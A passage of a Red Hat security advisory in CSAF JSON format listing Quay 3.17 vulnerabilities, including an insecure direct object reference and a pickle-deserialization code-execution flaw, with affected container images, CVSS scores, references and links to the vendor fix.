        },
        {
          "category": "external",
          "summary": "RHBZ#2446963",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446963"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32589",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32589"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32589",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32589"
        }
      ],
      "release_date": "2026-04-08T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "mirror-registry: quay: insecure direct object reference in BlobUpload"
    },
    {
      "acknowledgments": [
        {
          "names": [
            "Antony Di Scala",
            "Michael Whale"
          ]
        }
      ],
      "cve": "CVE-2026-32590",
      "cwe": {
        "id": "CWE-502",
        "name": "Deserialization of Untrusted Data"
      },
      "discovery_date": "2026-03-12T14:43:11.443000+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2446964"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Red Hat Quay\u0027s handling of resumable container image layer uploads. The upload process stores intermediate data in the database using a format that, if tampered with, could allow an attacker to execute arbitrary code on the Quay server.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "mirror-registry: remote code execution using pickle deserialization",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Exploitation requires valid login credentials. The attacker must be authenticated to the registry, either through the web interface or through a container tool such as Podman.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32590"
        },
        {
          "category": "external",
          "summary": "RHBZ#2446964",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446964"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32590",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32590"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32590",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32590"
        }
      ],
      "release_date": "2026-04-08T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "mirror-registry: remote code execution using pickle deserialization"
    },
    {
      "cve": "CVE-2026-33186",
      "cwe": {
        "id": "CWE-551",
        "name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
      },
      "discovery_date": "2026-03-20T23:02:27.802640+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
